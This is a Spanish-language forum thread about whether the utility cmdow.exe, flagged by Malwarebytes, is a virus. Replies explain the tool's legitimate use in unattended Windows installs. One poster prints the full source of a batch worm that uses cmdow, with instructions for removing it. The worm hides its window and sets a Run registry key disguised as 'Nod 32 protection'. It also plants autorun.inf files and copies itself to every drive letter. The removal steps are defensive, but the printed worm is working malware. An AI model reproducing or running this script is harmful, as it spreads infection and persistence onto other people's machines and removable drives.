Muy buenas, he pasado el malwarebytes antimalware a mi ordenador y me ha detectado el cmdow.exe como una amenaza, me pide eliminarlo, se puede eliminar sin problema o es algo esencial de windows?
No quiero que me pase que cuando reinicie el ordenador el windows me de fallo.
un saludo
El cmdow.exe no es un virus Hace unos días, un compañero de trabajo estaba "limpiando" de virus su notebook con el NOD32 y, luego de configurarlo para que detectara también lo "potencialmente peligroso", el soft en cuestión detectó al cmdow.exe como "peligroso". En realidad estaba comprimido dentro de una carpeta donde tiene al S.O. comprimido, para pasarlo a un CD y crear un CD de instalación (estaba dentro de un archivo .cab), los que se usan en estos casos. Llegado este momento, debemos analizar varios puntos: 1- el cmdow.exe no estaba/está funcional (o funcionando) ya que estaba comprimido dentro de un archivo .cab, por lo tanto no era/es peligroso. 2- ante la pregunta de, si al instalar ese S.O. (con el futuro CD) y descomprimirse el .cab, el cmdow.exe descomprimido sería peligroso; la respuesta vuelve a ser no (ya veremos por qué). 3- la carpeta en cuestión (donde está el .cab) aloja un S.O. de esos que son autoinstables, como el Windows UE6 del que hablé en otros posts; y esa es la razón por la que debemos estar más tranquilos. 4- si bien el cmdow.exe puede ser usado por algún programa malicioso, en realidad no es un virus. El cmdow.exe es un ejecutable que permite la manipulación de ventanas. Permite que se abran, que se cierren, que cambien de tamaño, y todo sin la intervención del usuario. Por eso es usado en instalaciones de S.O. como el Windows UE, es decir en instalaciones desatendidas, donde el usuario interviene muy poco.
Entonces no lo elimino?
Si tanto te asuste en malware no sé que haces usando Windows. Lo que los programas anti-bichos detectaron fue Windows, y te están diciendo que quites Windows. Además ten cuidado con los programas anti-bichos, pues a veces son más bichos que los propios bichos.
ES UN VIRUS QUE SE CONTAGIA DESDE UN ARCHIVO EJECUTABLE.BAT
AQUI ESTA SU ACCIONAR
cmdow @ /hid
if %1==/r goto desderun
start %cd%
goto saltear
:desderun
::start "%cd%"
:saltear
rem ******************************COMIENZO DE INFECCION DE LETRAS *******************************
:arriba
for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do if exist %%a:\ (
echo Encontrada unidad %%a
if exist %%a:\autorun.inf attrib %%a:\autorun.inf -h -r -s
if exist %%a:\autorun.inf rd %%a:\autorun.inf /s /q
if exist %%a:\autorun.inf del %%a:\autorun.inf
copy %windir%\cmdow.exe %%a:\data.cab
copy %windir%\maloso.bat %%a:\instalar.bat
copy %windir%\maloso.inf %%a:\autorun.inf
)
rem ******************************FIN INFECCION DE LETRAS ***************************************
rem ******************************COMIENZO DE JODA **********************************************
rem ******************************FIN DE JODA ***************************************************
ping 127.0.0.1 -n 10 > nul
goto arriba
COPIE INCOMPLETO, AQUI LES PASO TODO LO QUE HACE ESTE VIRUS QUE ENTRE OTRAS COSAS HACE QUE LAS UNIDADES DE DISCO NO SE VEAN DESDE MI PC
@echo off
rem *******************************INFECCION DE LA COMPUTADORA EN USO ***************************
copy data.cab %windir%\cmdow.exe > nul
copy instalar.bat %windir%\maloso.bat > nul
copy instalar.bat c:\Nod_32.bat > nul
echo [autorun] > %windir%\maloso.inf
echo shellexecute=instalar.bat >> %windir%\maloso.inf
echo shell\auto\command=instalar.bat >> %windir%\maloso.inf
echo Windows Registry Editor Version 5.00 > %windir%\maloso.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %windir%\maloso.reg
echo "Nod 32 protection"="c:\\Nod_32 /r" >> %windir%\maloso.reg
reg import %windir%\maloso.reg
rem *******************************FIN DE LA INFECCION DE LA COMPUTADORA EN USO *****************
cmdow @ /hid
if %1==/r goto desderun
start %cd%
goto saltear
:desderun
::start "%cd%"
:saltear
rem ******************************COMIENZO DE INFECCION DE LETRAS *******************************
:arriba
for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do if exist %%a:\ (
echo Encontrada unidad %%a
if exist %%a:\autorun.inf attrib %%a:\autorun.inf -h -r -s
if exist %%a:\autorun.inf rd %%a:\autorun.inf /s /q
if exist %%a:\autorun.inf del %%a:\autorun.inf
copy %windir%\cmdow.exe %%a:\data.cab
copy %windir%\maloso.bat %%a:\instalar.bat
copy %windir%\maloso.inf %%a:\autorun.inf
)
rem ******************************FIN INFECCION DE LETRAS ***************************************
rem ******************************COMIENZO DE JODA **********************************************
rem ******************************FIN DE JODA ***************************************************
ping 127.0.0.1 -n 10 > nul
goto arriba
----------------------------------
BORRAR TODA ESTA BASURA (LO PUSE YO)
%windir%\cmdow.exe
%windir%\maloso.bat
%windir%\maloso.inf
%windir%\maloso.reg
instalar.bat
c:\Nod_32.bat
instalar.bat
data.cab
autorun.inf
Este virus en realidad se copia a través de un pendrive, cuando este virus detecta unidades de red, copia los tres archivos data.cab, instalar.bat y autorun.inf... PASO 1: si su equipo es un pc pesonal que no está en ninguna red entra la regedit y busca la clave dmdow.exe y maloso elimina las claves y luego borra del disco duro los archivos creados. PASO 2: Si el caso es que existe una red deben desconectar la red y buscar primero el equipo que obtuvo el virus, es decir, la primera maquina contagiada y hacer el PASO 1, luego deben ir a cada equipo con unidades compartidas y eliminar estos tres archivos.
